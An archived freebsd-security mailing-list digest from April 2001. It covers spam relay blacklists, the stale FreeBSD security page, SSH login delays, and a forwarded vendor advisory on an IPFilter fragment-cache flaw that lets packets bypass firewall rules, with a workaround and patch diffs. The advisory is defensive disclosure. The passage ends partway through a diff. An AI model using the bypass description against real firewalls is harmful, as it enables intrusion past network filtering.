hornet.capis.com (hornet.capis.com [192.189.243.13]) by eagle.capis.com (AIX4.3/UCB 8.8.8/8.8.8) with ESMTP id OAA19546 for ; Fri, 6 Apr 2001 14:17:42 -0400 Received: from tomcat.capis.com (unverified) by hornet.capis.com (Content Technologies SMTPRS 4.1.2) with ESMTP id ; Fri, 6 Apr 2001 13:17:38 -0500 Received: from wkstn195.capis.com ([192.168.130.195]) by tomcat.capis.com (Lotus Domino Release 5.0.2c) with ESMTP id 2001040613163905:12270 ; Fri, 6 Apr 2001 13:16:39 -0500 Received: (from jdunfee@localhost) by wkstn195.capis.com (8.11.0/8.11.0) id f36IO9W18372; Fri, 6 Apr 2001 13:24:09 -0500 X-Authentication-Warning: wkstn195.capis.com: jdunfee set sender to jdunfee@capis.com using -f X-Mailer: 21.1 (patch 12) "Channel Islands" XEmacs Lucid (via feedmail 8 I); VM 6.72 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid From: "Jonathan D. Dunfee" MIME-Version: 1.0 Message-ID: <15054.2505.82150.548911@wkstn195.capis.com> Date: Fri, 6 Apr 2001 13:24:09 -0500 (CDT) To: Christopher Schulte Cc: freebsd-security@freebsd.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> References: <20010406163753.C49061C83B@pop162-leg.mail.com> <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> Reply-To: Jonathan Dunfee X-MIMETrack: Itemize by SMTP Server on Tomcat/CIS(Release 5.0.2c |February 2, 2000) at 04/06/2001 01:16:39 PM, Serialize by Router on Tomcat/CIS(Release 5.0.2c |February 2, 2000) at 04/06/2001 01:16:39 PM, Serialize complete at 04/06/2001 01:16:39 PM Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've used orbs myself and like it (www.orbs.org). And I normally stay pretty quiet on the list, but these spam's seem be increasing in frequency. That and if one of these guys is being used as an relay unknowningly, it seems like someone should call them as a courtesy. We can just report them, but I know I'd like a call first if it was my server. Jon Christopher Schulte writes: > At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote: > >I check and pop162-leg.mail.com is definitely relaying > >mail. > > I generally don't reply re: 'spam' on mailing lists, but this question is > valid and should be answered: > > >Is there someone who takes care of this? > > http://www.mail-abuse.org/ > > RSS runs a database of open relays which are reported to them by the > Internet community. > > They operate a 'DNS BLACKLIST' where mail admins can add hooks into their > MTAs which will check every incoming smtp connection and see if RSS has > listed the box as an open relay. Such messages are discarded before they > ever hit a user's spool. > > There are other such lists of this nature... ORBS being the biggest one > that I can think of. > > >Jon -- ****************************************************************** This communication is for informational purposes only. It is not intended as an offer or solicitation for the purchase or sale of any financial instrument or as an official confirmation of any transaction, unless specifically agreed otherwise. All market prices, data and other information are not warranted as to completeness or accuracy and are subject to change without notice. Any comments or statements made herein do not necessarily reflect the views or opinions of Capital Institutional Services, Inc. Capital Institutional Services, Inc. accepts no liability for any errors or omissions arising as a result of transmission. Use of this communication by other than intended recipients is prohibited. ****************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 12: 5:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from fud.indifference.org (cr597818-a.crdva1.bc.wave.home.com [24.113.89.211]) by hub.freebsd.org (Postfix) with SMTP id 1F94937B496 for ; Fri, 6 Apr 2001 12:05:49 -0700 (PDT) (envelope-from lists@indifference.org) Received: (qmail 89803 invoked by uid 1001); 6 Apr 2001 19:05:48 -0000 Date: Fri, 6 Apr 2001 12:05:48 -0700 From: kj To: freebsd-security@freebsd.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Message-ID: <20010406120548.I89385@indifference.org> References: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rsimmons@wlcg.com on Fri, Apr 06, 2001 at 02:14:32PM -0400 X-Operating-System: BrokenBSD 1.1.2 X-List-Master: indifference.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, spamcop.net is not that great. For companies that host dns and web/dns forwarding, they are fallen victim to spamcop.net. Currently, the many emails we send to spamcop.net trying to explain the situation are not answered or bounced. Yet, we keep getting these spamcop warnings that we are spamming so and so when in fact it is a customer we host. The only solution was to firewall their mail servers, as they are spamming us. Sometimes emailing us hundreds of emails in a day. K.J. > http://spamcop.net is another good site for this. > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 13: 4:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from sj-msg-core-4.cisco.com (sj-msg-core-4.cisco.com [171.71.163.10]) by hub.freebsd.org (Postfix) with ESMTP id C82E037B424 for ; Fri, 6 Apr 2001 13:04:35 -0700 (PDT) (envelope-from bmah@cisco.com) Received: from bmah-freebsd-0.cisco.com (bmah-freebsd-0.cisco.com [171.70.84.42]) by sj-msg-core-4.cisco.com (8.9.3/8.9.1) with ESMTP id NAA04611; Fri, 6 Apr 2001 13:04:35 -0700 (PDT) Received: (from bmah@localhost) by bmah-freebsd-0.cisco.com (8.11.3/8.11.1) id f36K4Vc96330; Fri, 6 Apr 2001 13:04:31 -0700 (PDT) (envelope-from bmah) Message-Id: <200104062004.f36K4Vc96330@bmah-freebsd-0.cisco.com> X-Mailer: exmh version 2.3.1 01/19/2001 with nmh-1.0.4 To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: http://www.freebsd.org/security being maintained? (ntpd/ftpd/...) In-Reply-To: References: Comments: In-reply-to Roger Marquis message dated "Wed, 04 Apr 2001 20:11:13 -0700." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_338369850P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 06 Apr 2001 13:04:31 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_338369850P Content-Type: text/plain; charset=us-ascii If memory serves me right, Roger Marquis wrote: > Is anyone maintaining http://www.freebsd.org/security/? I ask > because it hasn't been updated in over a month and contains no > information on the ntpd or ftpd vulnerabilities. Well, for the ntpd problem, that just cropped up in the last 48 hours, and the latest commits to -CURRENT and -STABLE happened within the last 4 hours. It's kind of premature to issue an advisory before the problem has been completely fixed...give security-officer@ a break, already... :-) That being said, you do have a point in that the Web page isn't up-to-date. I'll add that the FTP archive of advisories is missing several files as well. As a result, the release notes cross-reference security advisories that no one can find (specifically 01:28 and 01:29). I don't know if this more the domain of the Web site maintainers or the security-officer team, but it'd be real nice to get these two things fixed up before 4.3-RELEASE. Anyone? Thanks from Mr. Relnotes. Cheers, Bruce. --==_Exmh_338369850P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.2 06/23/2000 iD8DBQE6ziFO2MoxcVugUsMRAus/AKD51aIPwzEKiDr0MUNJNwyYTTIVdgCfWq8A KXdX42Elg3hMjRfMTY7LhaI= =GnfW -----END PGP SIGNATURE----- --==_Exmh_338369850P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 13: 9:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.timogen.com (adsl-64-167-116-118.dsl.snfc21.pacbell.net [64.167.116.118]) by hub.freebsd.org (Postfix) with ESMTP id 9C6AD37B422 for ; Fri, 6 Apr 2001 13:09:15 -0700 (PDT) (envelope-from john@timogen.com) Received: from timogen.com (pc204 [192.168.100.204]) by mail.timogen.com (8.8.8/8.8.3) with ESMTP id LAA08206; Fri, 6 Apr 2001 11:15:00 -0700 Message-ID: <3ACE231F.664FA8D9@timogen.com> Date: Fri, 06 Apr 2001 13:12:15 -0700 From: John Calderon X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: anderson@centtech.com Cc: Guy Poizat , George.Giles@mcmail.vanderbilt.edu, security@FreeBSD.ORG Subject: Re: SSH login delay References: <5.0.2.1.0.20010328113829.01ac0d30@pop.partsonline.fr> <3AC4A923.87D7F20C@centtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org also there are some serious delays with large sites > 60000 and also if you start ssh out of inetd. john Eric Anderson wrote: > Actually, we had the same problem.. run the patches to openssh on the > server side (and client side if you can) and it should fix it.. > > Guy Poizat wrote: > > > > At 16:03 27/03/2001, you wrote: > > >Does any one know what causes the long delay between entering the password > > >to ssh and the actual logging in of the shell prompt ? > > > > > >Sometimes it takes more than a minute when I know it is not network speed ? > > > > > >This behavior makes me suspicious. > > > > > >This is observed on the latest release of FreeBSD. > > > > Perhaps it has somethin' to deal with DNS lookup failure (timeout->delay) ? > > Can all of your hosts get a reply for a DNS query about each others ? > > > > I got that kind of problem and solved it by ading a BIND serving for my > > NATed hosts. > > > > -- > > Guy Poizat > > poizat@partsonline.fr > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > ------------------------------------------------------------------------------- > Eric Anderson anderson@centtech.com > Centaur Technology (512) 418-5792 > To see a need and wait to be asked, is to already refuse. > ------------------------------------------------------------------------------- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 14:37: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 751F237B424 for ; Fri, 6 Apr 2001 14:36:41 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA17925 for ; Fri, 6 Apr 2001 14:36:40 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17923; Fri Apr 6 14:36:29 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f36LaOW65049 for ; Fri, 6 Apr 2001 14:36:24 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdh65047; Fri Apr 6 14:35:52 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f36LZpt67966 for ; Fri, 6 Apr 2001 14:35:51 -0700 (PDT) Message-Id: <200104062135.f36LZpt67966@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdh67960; Fri Apr 6 14:35:15 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: freebsd-security@freebsd.org Subject: URGENT: Serious bug in IPFilter (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Apr 2001 14:35:14 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Should we be updating IP Filter in our source tree before 4.3-RELEASE? This sounds like a serious bug. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] From: Darren Reed Message-Id: <200104061656.CAA09703@avalon.reed.wattle.id.au> Subject: URGENT: Serious bug in IPFilter To: ipfilter@coombs.anu.edu.au Date: Sat, 7 Apr 2001 02:56:42 +1000 (EST) X-Mailer: ELM [version 2.4ME+ PL37 (25)] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=ELM986576202-7114-0_ Content-Transfer-Encoding: 7bit Sender: owner-ipfilter@coombs.anu.edu.au - --ELM986576202-7114-0_ Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit A *VERY* serious bug has been brought to my attention in IPFilter. In 10 words or less, fragment caching with can let through "any" packet. Ok, so that's 8. Cause ===== When matching a fragment, only srcip, dstip and IP ID# are checked and the fragment cache is checked *before* any rules are checked. It does not even need to be a fragment. Even if you block all fragments with a rule, fragment cache entries can be created by packets that match state information currently held. How to disable fragment caching =============================== In realtime, use adb or gdb or kgdb or whatever to change the variable named "ipfr_inuse" to 1000000. 1000000 isn't important, it just needs to be larger than IPFT_SIZE and an integer. NOTE: there are no sysctl's on BSD systems to adjust this if securelevel is > 0. New version details with fix ============================ IP Filter 3.2.* Email me (nobody should be using this now :*) IP Filter 3.3.22 ftp://coombs.anu.edu.au/pub/net/ip-filter/ip_fil3.3.22.tar.gz ftp://coombs.anu.edu.au/pub/net/ip-filter/patch-3.3.22.gz http://coombs.anu.edu.au/~avalon/ip_fil3.3.22.tar.gz http://coombs.anu.edu.au/~avalon/patch-3.3.22.gz IP Filter 3.4.17 ftp://coombs.anu.edu.au/pub/net/ip-filter/ip_fil3.4.17.tar.gz ftp://coombs.anu.edu.au/pub/net/ip-filter/patch-3.4.17.gz http://coombs.anu.edu.au/~avalon/ip_fil3.4.17.tar.gz http://coombs.anu.edu.au/~avalon/patch-3.4.17.gz Frag Patches ============ One attachment each for 3.3.21 and 3.4.16. These patches do not contain changes for NAT code to make the fragment cache selective (see below), just stop packets which aren't meant to match from matching. You are much better off updating the whole rev step if you can. How to enable it in new versions ================================ Enable a security hole you say ? You will need to have "keep state keep frags" in your rule, not just "keep state". That is rules with just "keep state" will no longer create fragment cache enties (as happens now). Remaining Issues ================ 1. There is an automatic frgament cache used by NAT which is now disabled by default and requires "frag" to be inserted into a NAT rule in order for it to function. 2. Any and all packets which are fragments and match the required tuple (being srcip, dstip, ipid) will be let through so long as the frag cache entry remains. 3. Use of "keep frags" with "keep state" means fragment cache entries can be created by packets going in *either* direction. Nothing will get added (now) to the fragment cache without being explicitly allowed by a rule (IPF or NAT). Why not reassemble fragmented packets? ====================================== Because it is *really bad* for a router to do this. I run TCP/IP over a fibre channel interface which has an MTU of 65280. I *cannot* even send full size packets over it without them being fragmented due to buffer size problems so I'm not going to even think about defragmentation issues! I don't care who does it, if you've done your networking 101, you know why routers (i.e. firewalls) do *NOT* defragment packets. Darren How to exploit? Something will end up on bugtraq but so far, what I've seen isn't a complete exploit of the problem. - --ELM986576202-7114-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=fragpatch-3-4-16.txt Content-Description: fragpatch-3-4-16.txt Content-Transfer-Encoding: 7bit diff -cr ip_fil3.4.16/ip_frag.c ip_fil3.4.17/ip_frag.c *** ip_fil3.4.16/ip_frag.c Mon Nov 27 21:26:56 2000 - --- ip_fil3.4.17/ip_frag.c Fri Apr 6 22:31:20 2001 *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.8 2001/04/06 12:31:20 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) *************** *** 141,152 **** u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx; if (ipfr_inuse >= IPFT_SIZE) return NULL; frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; - --- 141,155 ---- u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx, off; if (ipfr_inuse >= IPFT_SIZE) return NULL; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; *************** *** 200,206 **** /* * Compute the offset of the expected start of the next packet. */ ! fra->ipfr_off = (ip->ip_off & IP_OFFMASK) + (fin->fin_dlen >> 3); ATOMIC_INCL(ipfr_stats.ifs_new); ATOMIC_INC32(ipfr_inuse); return fra; - --- 203,212 ---- /* * Compute the offset of the expected start of the next packet. */ ! off = ip->ip_off & IP_OFFMASK; ! if (!off) ! fra->ipfr_seen0 = 1; ! fra->ipfr_off = off + (fin->fin_dlen >> 3); ATOMIC_INCL(ipfr_stats.ifs_new); ATOMIC_INC32(ipfr_inuse); return fra; *************** *** 256,261 **** - --- 262,270 ---- ipfr_t *f, frag; u_int idx; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + /* * For fragments, we record protocol, packet id, TOS and both IP#'s * (these should all be the same for all fragments of a packet). *************** *** 283,288 **** - --- 292,310 ---- IPFR_CMPSZ)) { u_short atoff, off; + /* + * XXX - We really need to be guarding against the + * retransmission of (src,dst,id,offset-range) here + * because a fragmented packet is never resent with + * the same IP ID#. + */ + off = ip->ip_off & IP_OFFMASK; + if (f->ipfr_seen0) { + if (!off || (fin->fin_fi.fi_fl & FI_SHORT)) + continue; + } else if (!off) + f->ipfr_seen0 = 1; + if (f != table[idx]) { /* * move fragment info. to the top of the list *************** *** 295,301 **** f->ipfr_prev = NULL; table[idx] = f; } - - off = ip->ip_off & IP_OFFMASK; atoff = off + (fin->fin_dlen >> 3); /* * If we've follwed the fragments, and this is the - --- 317,322 ---- diff -cr ip_fil3.4.16/ip_frag.h ip_fil3.4.17/ip_frag.h *** ip_fil3.4.16/ip_frag.h Sat Nov 11 00:10:54 2000 - --- ip_fil3.4.17/ip_frag.h Fri Apr 6 22:31:20 2001 *************** *** 6,12 **** * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.4.2.2 2000/11/10 13:10:54 darrenr Exp $ */ #ifndef __IP_FRAG_H__ - --- 6,12 ---- * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.4.2.3 2001/04/06 12:31:20 darrenr Exp $ */ #ifndef __IP_FRAG_H__ *************** *** 24,30 **** u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_short ipfr_ttl; frentry_t *ipfr_rule; } ipfr_t; - --- 24,31 ---- u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_char ipfr_ttl; ! u_char ipfr_seen0; frentry_t *ipfr_rule; } ipfr_t; *************** *** 40,46 **** struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (4 + 4 + 2 + 1 + 1) extern int fr_ipfrttl; extern int fr_frag_lock; - --- 41,48 ---- struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (offsetof(ipfr_t, ipfr_off) - \ ! offsetof(ipfr_t, ipfr_src)) extern int fr_ipfrttl; extern int fr_frag_lock; diff -cr ip_fil3.4.16/ip_state.c ip_fil3.4.17/ip_state.c *** ip_fil3.4.16/ip_state.c Tue Jan 9 01:04:46 2001 - --- ip_fil3.4.17/ip_state.c Fri Apr 6 22:31:21 2001 *************** *** 1,5 **** /* ! * Copyright (C) 1995-2000 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1995-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.30.2.28 2001/01/08 14:04:46 darrenr Exp $"; #endif #include - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.30.2.30 2001/04/06 12:31:21 darrenr Exp $"; #endif #include *************** *** 688,694 **** #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = IP6NEQ(is->is_dst, fin->fin_fi.fi_dst); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } - --- 690,696 ---- #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = IP6NEQ(is->is_dst, fin->fin_fi.fi_dst); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } *************** *** 1302,1307 **** - --- 1307,1317 ---- if (!fr_tcpstate(is, fin, ip, tcp)) { continue; } + } if ((pr == IPPROTO_UDP)) { + if (fin->fin_rev) + is->is_age = fr_udpacktimeout; + else + is->is_age = fr_udptimeout; } break; } *************** *** 1345,1351 **** fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --- 1355,1361 ---- fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --ELM986576202-7114-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=fragpatch-3-3-21.txt Content-Description: fragpatch-3-3-21.txt Content-Transfer-Encoding: 7bit diff -cr ip_fil3.3.21/ip_frag.c ip_fil3.3.22/ip_frag.c *** ip_fil3.3.21/ip_frag.c Mon Jan 15 00:56:08 2001 - --- ip_fil3.3.22/ip_frag.c Fri Apr 6 22:31:05 2001 *************** *** 1,5 **** /* ! * Copyright (C) 1993-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1993-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.4.2.7 2001/01/14 13:56:08 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.4.2.8 2001/04/06 12:31:05 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) *************** *** 134,145 **** u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx; if (ipfr_inuse >= IPFT_SIZE) return NULL; frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; - --- 134,148 ---- u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx, off; if (ipfr_inuse >= IPFT_SIZE) return NULL; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; *************** *** 193,199 **** /* * Compute the offset of the expected start of the next packet. */ ! fra->ipfr_off = (ip->ip_off & IP_OFFMASK) + (fin->fin_dlen >> 3); ATOMIC_INC(ipfr_stats.ifs_new); ATOMIC_INC(ipfr_inuse); return fra; - --- 196,205 ---- /* * Compute the offset of the expected start of the next packet. */ ! off = ip->ip_off & IP_OFFMASK; ! if (!off) ! fra->ipfr_seen0 = 1; ! fra->ipfr_off = off + (fin->fin_dlen >> 3); ATOMIC_INC(ipfr_stats.ifs_new); ATOMIC_INC(ipfr_inuse); return fra; *************** *** 245,250 **** - --- 251,259 ---- ipfr_t *f, frag; u_int idx; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + /* * For fragments, we record protocol, packet id, TOS and both IP#'s * (these should all be the same for all fragments of a packet). *************** *** 272,277 **** - --- 281,299 ---- IPFR_CMPSZ)) { u_short atoff, off; + /* + * XXX - We really need to be guarding against the + * retransmission of (src,dst,id,offset-range) here + * because a fragmented packet is never resent with + * the same IP ID#. + */ + off = ip->ip_off & IP_OFFMASK; + if (f->ipfr_seen0) { + if (!off || (fin->fin_fi.fi_fl & FI_SHORT)) + continue; + } else if (!off) + f->ipfr_seen0 = 1; + if (f != table[idx]) { /* * move fragment info. to the top of the list *************** *** 284,290 **** f->ipfr_prev = NULL; table[idx] = f; } - - off = ip->ip_off & IP_OFFMASK; atoff = off + (fin->fin_dlen >> 3); /* * If we've follwed the fragments, and this is the - --- 306,311 ---- diff -cr ip_fil3.3.21/ip_frag.h ip_fil3.3.22/ip_frag.h *** ip_fil3.3.21/ip_frag.h Sat Nov 11 00:11:45 2000 - --- ip_fil3.3.22/ip_frag.h Fri Apr 6 22:31:06 2001 *************** *** 1,12 **** /* ! * Copyright (C) 1993-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.2.2.1 2000/11/10 13:11:45 darrenr Exp $ */ #ifndef __IP_FRAG_H__ - --- 1,12 ---- /* ! * Copyright (C) 1993-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.2.2.2 2001/04/06 12:31:06 darrenr Exp $ */ #ifndef __IP_FRAG_H__ *************** *** 24,30 **** u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_short ipfr_ttl; frentry_t *ipfr_rule; } ipfr_t; - --- 24,31 ---- u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_char ipfr_ttl; ! u_char ipfr_seen0; frentry_t *ipfr_rule; } ipfr_t; *************** *** 40,46 **** struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (4 + 4 + 2 + 1 + 1) extern int fr_ipfrttl; extern ipfrstat_t *ipfr_fragstats __P((void)); - --- 41,48 ---- struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (offsetof(ipfr_t, ipfr_off) - \ ! offsetof(ipfr_t, ipfr_src)) extern int fr_ipfrttl; extern ipfrstat_t *ipfr_fragstats __P((void)); diff -cr ip_fil3.3.21/ip_state.c ip_fil3.3.22/ip_state.c *** ip_fil3.3.21/ip_state.c Wed Aug 9 02:00:35 2000 - --- ip_fil3.3.22/ip_state.c Fri Apr 6 22:31:07 2001 *************** *** 1,5 **** /* ! * Copyright (C) 1995-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1995-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.3.2.28 2000/08/08 16:00:35 darrenr Exp $"; #endif #include - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.3.2.30 2001/04/06 12:31:07 darrenr Exp $"; #endif #include *************** *** 427,433 **** #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = (is->is_dst.s_addr != ip->ip_dst.s_addr); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } - --- 427,433 ---- #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = (is->is_dst.s_addr != ip->ip_dst.s_addr); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } *************** *** 477,483 **** if (!(tcp->th_flags & TH_ACK)) { /* Pretend an ack was sent */ ack = tdata->td_end; win = 1; ! if ((tcp->th_flags == TH_SYN) && (tdata->td_maxwin == 0)) tdata->td_maxwin = 1; } else if (((tcp->th_flags & (TH_ACK|TH_RST)) == (TH_ACK|TH_RST)) && (ack == 0)) { - --- 477,484 ---- if (!(tcp->th_flags & TH_ACK)) { /* Pretend an ack was sent */ ack = tdata->td_end; win = 1; ! if 